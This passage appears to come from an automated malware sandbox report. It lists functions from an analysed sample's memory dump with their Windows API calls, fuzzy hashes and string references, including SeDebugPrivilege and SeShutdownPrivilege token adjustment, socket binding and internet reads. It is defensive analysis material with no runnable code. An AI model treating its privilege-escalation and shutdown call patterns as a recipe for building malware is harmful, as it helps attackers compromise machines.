Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3e81258a54abba4baa9bd56f2721ae73df442ec371ca4e5895d00953d6348fec
Instruction ID: 237aee21920d60e757c76f69e73d4ae058d1de7556a40fb8ce6fd7e8f48d6b9c
Opcode Fuzzy Hash: 3e81258a54abba4baa9bd56f2721ae73df442ec371ca4e5895d00953d6348fec
Instruction Fuzzy Hash: FA219E38600200AFCB14EF64C94AF6EB7B9EF85760F158169F95AE73D2CB74AD018B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A2F65E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A2F6AB
Sleep.KERNEL32(0000000A), ref: 00A2F6DB
FindNextFileW.KERNEL32(?,?), ref: 00A2F7A8
FindClose.KERNEL32(00000000), ref: 00A2F7BE

Strings

*.*, xrefs: 00A2F690

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNextSleep
String ID: *.*
API String ID: 1749430636-438819550
Opcode ID: a65c60141f89fcf818886489e7897cb9083756acc918c3d14b6a30d306113af8
Instruction ID: e50d3db298cfe8e031f7f18dd0f57ae71e9384ea86c6784aab0150e53a649010
Opcode Fuzzy Hash: a65c60141f89fcf818886489e7897cb9083756acc918c3d14b6a30d306113af8
Instruction Fuzzy Hash: 79414B7690021AAFCB11DFA4DD89AEEBBB4FF45350F14457AE415A21A0DB319E44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C1287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 009C19FA
GetSysColor.USER32(0000000F), ref: 009C1A4E
SetBkColor.GDI32(?,00000000), ref: 009C1A61

Part of subcall function 009C1290: DefDlgProcW.USER32(?,00000020,?), ref: 009C12D8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 06f4d1084309c884991ce7dc16e077ccf5e16b447a87fc353a19cad9135f47ad
Instruction ID: c80e2dab44448be2421260844fd03d94b2161af1df56e439d9f0c588ca914ec7
Opcode Fuzzy Hash: 06f4d1084309c884991ce7dc16e077ccf5e16b447a87fc353a19cad9135f47ad
Instruction Fuzzy Hash: BBA16870906548BAE728AF299C54FBF259CDB83352F54051EF507D61A3CE29CD0293BB

Uniqueness

Uniqueness Score: -1.00%

Function 00A36A5A, Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 00A380CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A36AB1
WSAGetLastError.WSOCK32(00000000), ref: 00A36ADA
bind.WSOCK32(00000000,?,00000010), ref: 00A36B13
WSAGetLastError.WSOCK32(00000000), ref: 00A36B20
closesocket.WSOCK32(00000000,00000000), ref: 00A36B34

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 46adbe178365efc53013d3d95e4fb065359313359495482f7408deb54503e27b
Instruction ID: 3374a596c7587cc71213be8ad0ec432345d3d7981386d9e1eebea276196a0e95
Opcode Fuzzy Hash: 46adbe178365efc53013d3d95e4fb065359313359495482f7408deb54503e27b
Instruction Fuzzy Hash: 2241B475B00610AFEB10BF64DC86F6E77A89B85710F04805CF91AAB3D2CA709D018792

Uniqueness

Uniqueness Score: -1.00%

Function 00A455FD, Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A4564C
IsWindowEnabled.USER32 ref: 00A4565A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00A45667
IsIconic.USER32 ref: 00A45675
IsZoomed.USER32 ref: 00A45683

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 016b9d9e46cb72dbe752acc5ebe5c3530726d1a627d80dd24d4c5442a8c09651
Instruction ID: 95ec22ddf2bd6945e9e3615c0e64363df5d1090be72caa3c59c88b81d36f79e7
Opcode Fuzzy Hash: 016b9d9e46cb72dbe752acc5ebe5c3530726d1a627d80dd24d4c5442a8c09651
Instruction Fuzzy Hash: BB11C439B009106FE7216F76DC44B2FF799EFC5721B4A4029F806D7252CB759902CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 009D4140, Relevance: 7.4, Strings: 5, Instructions: 1183COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00A07B0C
ERCP, xrefs: 009D421F
VUUU, xrefs: 009D44ED
VUUU, xrefs: 009D4520
VUUU, xrefs: 009D44DB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 90cd0529db28e63d2c75305a579832ba287c82bd6c22cfa2499f85c3371b1f69
Instruction ID: 9de95e4dff5a98710bd7d620a93217554b030f22d5e6e690abd751ee6af6d71f
Opcode Fuzzy Hash: 90cd0529db28e63d2c75305a579832ba287c82bd6c22cfa2499f85c3371b1f69
Instruction Fuzzy Hash: 47A27C74E4421ACBDF24CF58D9907ADB7B1BB54314F24C5AAE85AA7380E734AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A2545F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A18CC3: LookupPrivilegeValueW.ADVAPI32(?,00000000,00000004), ref: 00A18D0D
Part of subcall function 00A18CC3: AdjustTokenPrivileges.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A18D3A
Part of subcall function 00A18CC3: GetLastError.KERNEL32(?,00000000,?), ref: 00A18D47

ExitWindowsEx.USER32(00000000,00000000), ref: 00A2549B

Strings

SeShutdownPrivilege, xrefs: 00A2546B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: SeShutdownPrivilege
API String ID: 2234035333-3733053543
Opcode ID: c5607fbcca7ce18815506be15472ecdedcd7ab6750d36f71e9340994e9c62687
Instruction ID: f2f4039c508ded1fe100e39f412258d48620369cbedf1b92d0d313e8ca8ce083
Opcode Fuzzy Hash: c5607fbcca7ce18815506be15472ecdedcd7ab6750d36f71e9340994e9c62687
Instruction Fuzzy Hash: C001B576A55A256DF628B7BCFC4AFFBB72DFB423A3F200431F406900D2D56658808160

Uniqueness

Uniqueness Score: -1.00%

Function 00A3C304, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A01D88,?), ref: 00A3C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A3C324

Strings

GetSystemWow64DirectoryW, xrefs: 00A3C31E
kernel32.dll, xrefs: 00A3C30D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: b0fe1595267c827abbf99953b19e734fdf410443be55776144bba6bed4995248
Instruction ID: 5c56550d8e22d54e871646fe2839c0f9143e07ab666a479fc71e89b272628577
Opcode Fuzzy Hash: b0fe1595267c827abbf99953b19e734fdf410443be55776144bba6bed4995248
Instruction Fuzzy Hash: FAE0ECB8600703DEDB209F69EC08A97BAD4EB49365F80D839F599D5560E770D442CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009F50D7, Relevance: 6.1, APIs: 4, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 009F510B
GetCurrentThreadId.KERNEL32 ref: 009F511A
GetCurrentProcessId.KERNEL32 ref: 009F5123
QueryPerformanceCounter.KERNEL32(?), ref: 009F5130

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 6767847688bf23492aa4dc727a4ab9cbd684522a83b155545c231b7258fc4683
Instruction ID: 2a572903dc36654a924a7931ccda121d65687fbe87cf7836b1af7a4dd792f007
Opcode Fuzzy Hash: 6767847688bf23492aa4dc727a4ab9cbd684522a83b155545c231b7258fc4683
Instruction Fuzzy Hash: 3A11CE79E05108EFCB14CBF8DD086BEBBB8EB49355F62447AD606D7250EB31AA00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F9D05, Relevance: 5.9, Strings: 4, Instructions: 910COMMON

Download Yara Rule

Strings

1#SNAN, xrefs: 009F9DCC
1#INF, xrefs: 009F9DF4
1#QNAN, xrefs: 009F9E15
1#IND, xrefs: 009F9DE5

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: 55310d702c641ccd6e899b69490280eb0bcb13315bfe8feaed2dcfc541e4aa8d
Instruction ID: 3020ada457df8abe887162ce183d8a5f7d8385ecf24231c8eff1fa4b3df5155b
Opcode Fuzzy Hash: 55310d702c641ccd6e899b69490280eb0bcb13315bfe8feaed2dcfc541e4aa8d
Instruction Fuzzy Hash: C6625AB2E0421E8FDF24CFA8C8406BDBBB5FF58314F25812AD959EB241D7749942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A325E2, Relevance: 4.7, APIs: 3, Instructions: 175networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00A326D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A3270C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: f205102e3131e2f0ab2555144ccefda8b54f8ea95368169668ce95878bf2291e
Instruction ID: b6a66545c44e972fca521b526de685339b92c49d05892905c3b9891313aa2010
Opcode Fuzzy Hash: f205102e3131e2f0ab2555144ccefda8b54f8ea95368169668ce95878bf2291e
Instruction Fuzzy Hash: FB41C476A04209BFEB219B95DC86FFBB7BCEF80369F10406AF201A5040DB719E419764

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B59E, Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A2B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A2B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A2B655

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 00cecab89b796c3ea3afd93e4f5f3cb7308c4b139e32782aac62cdcf9efda9cd
Instruction ID: 09c5af84669d08d1e2324f2866cf26a5902feff8b991d49c55e5ea3c4e4e075b
Opcode Fuzzy Hash: 00cecab89b796c3ea3afd93e4f5f3cb7308c4b139e32782aac62cdcf9efda9cd
Instruction Fuzzy Hash: 40216235A10518EFCB00EF95D884FEEBBB8FF89310F1480A9E905AB351DB319956CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A18CC3, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,00000000,00000004), ref: 00A18D0D
AdjustTokenPrivileges.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A18D3A
GetLastError.KERNEL32(?,00000000,?), ref: 00A18D47

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 4244140340-0
Opcode ID: d4651ff599805d63a3ef8805f2e81e1d27c7533bd8d74c7b651bd692c7c6e989
Instruction ID: f12186b0eaa05f37d17b4cb86ed81617f74b4d6124146be439d63f7b52c8ca1e
Opcode Fuzzy Hash: d4651ff599805d63a3ef8805f2e81e1d27c7533bd8d74c7b651bd692c7c6e989
Instruction Fuzzy Hash: 3611C4B1514309BFD728DF55EC85DABBBBCFB85361710852EF45542541DB31B841CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00A240B1, Relevance: 4.6, APIs: 3, Instructions: 68fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000001,00000000,?), ref: 00A240D1
DeviceIoControl.KERNEL32 ref: 00A24144
CloseHandle.KERNEL32(00000000), ref: 00A2414D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 27b333fd40f53ae5fe12307fac60aa2473a1015a6c437fba44e5eb666654abcf
Instruction ID: d56ccbfbe1a48caaf7e0cedd8b20eec56dc2721430f7ec22ac6ff21bd7de5935
Opcode Fuzzy Hash: 27b333fd40f53ae5fe12307fac60aa2473a1015a6c437fba44e5eb666654abcf
Instruction Fuzzy Hash: E011EB76A012287AE7309BA9AC4DFFB7B7CDF85760F0042A6F50896180D2754E80CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00A24C03, Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A24C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A24C43
FreeSid.ADVAPI32(?), ref: 00A24C53

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 942476544c283547e5d3e8b1f0b5077f672b677778830bf215d643fe1967fe47
Instruction ID: c30f97ff5001d23805e0f55aff7647474ded3217f1e50466fd6b56722ea2219b
Opcode Fuzzy Hash: 942476544c283547e5d3e8b1f0b5077f672b677778830bf215d643fe1967fe47
Instruction Fuzzy Hash: BDF04F7A95120CBFDB04CBE4EC89EFEBBBCEF49211F105469F501E2481D27266048B10

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C93C, Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A2C966
FindClose.KERNEL32(00000000), ref: 00A2C996

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1fc2eaee259b855d42592169aabf4c4fe1652a4c468a53a421befc402ba6d51b
Instruction ID: 0f1e03a29a3d01cdc3e5cb0aa6522afcbc2e379b9b5dbfebb45998866f3f73b5
Opcode Fuzzy Hash: 1fc2eaee259b855d42592169aabf4c4fe1652a4c468a53a421befc402ba6d51b
Instruction Fuzzy Hash: D211A1366006109FD710EF29D849E2AF7E9FF85320F00891EF8A9DB291DB70AC01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A2A2D5, Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000016,?,00000FFF,00000016,00000016,?,00A3977D,?,00000000,?,00000016,?,00000016), ref: 00A2A302
FormatMessageW.KERNEL32(00001000,00000016,000000FF,00000016,?,00000FFF,00000016,00000016,?,00A3977D,?,00000000,?,00000016,?,00000016), ref: 00A2A314

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 72343b3500892c83c6a8743dae87aa934c1d56b237f099096a82f41349c79bec
Instruction ID: a1b92df9a6cf164c5b2d448d52335f3ef737d26421174eadbf91c5578dec35b9
Opcode Fuzzy Hash: 72343b3500892c83c6a8743dae87aa934c1d56b237f099096a82f41349c79bec
Instruction Fuzzy Hash: 04F0E23924022DFBDB10DFA4DC48FFA7B2CEF0A3A2F008266F5089A480C6319504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A18713, Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00A3ED3E,00000002,00000000,00000005,00000000,?,SeDebugPrivilege), ref: 00A18728
CloseHandle.KERNEL32(?,00000000,00A3ED3E,00000002,00000000,00000005,00000000,?,SeDebugPrivilege), ref: 00A1873A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 74585f54121c4fd33b9d6bdf117932ef81199fdb6b39db4dbda372367b586448
Instruction ID: 50ba3fea50c29cffa6a4401d8897c7011c610995e6a90d3eaf7328849b1f91ce
Opcode Fuzzy Hash: 74585f54121c4fd33b9d6bdf117932ef81199fdb6b39db4dbda372367b586448
Instruction Fuzzy Hash: DBE0BF7A004641EEE7262B65ED09EB7BBE9EB85351710852DF49680870D7326C91DB10

Uniqueness

Uniqueness Score: -1.00%

Function 009EA395, Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,009E8F97,?,?,?,00000001), ref: 009EA39A
UnhandledExceptionFilter.KERNEL32(000000FF,?,?,00000001), ref: 009EA3A3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3d13ec7d9f181be649e917445dda0aa2c9c76daac2498ff0e8119c40a557e16f
Instruction ID: 0bd0ee7b802eac1802d189236f87e32f454ed8d6f299adffb887780bca19f81b
Opcode Fuzzy Hash: 3d13ec7d9f181be649e917445dda0aa2c9c76daac2498ff0e8119c40a557e16f
Instruction Fuzzy Hash: 4DB0923A190108AFCA005FD1FC09FA93F28EB87AEBF015021F11D88460C72320528A61

Uniqueness

Uniqueness Score: -1.00%

Function 009D3190, Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458fec43b56d9ee1a3c9d5d8b3475ad4a9a8e5df5f50a1e9d79adf2cefceb1ba
Instruction ID: 526be0caa8683243c9ed3585c18f36cad59a30a3647fd797bf7dcd74b2de5777
Opcode Fuzzy Hash: 458fec43b56d9ee1a3c9d5d8b3475ad4a9a8e5df5f50a1e9d79adf2cefceb1ba
Instruction Fuzzy Hash: 43228A71A083019FD724DF24D891BAEB7E4AF84300F14891EF99A97391DB75EA44CB93

Uniqueness

Uniqueness Score: -1.00%

Function 009ECD61, Relevance: 1.8, APIs: 1, Instructions: 270COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF,?,?,009ECAA7,?,?,?,?,?,?,00000000), ref: 009ECF8C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: fd5e3af75ddb2d6fd7f9f1cf4358c20c25bd2db3069e5d40d384054955356c98
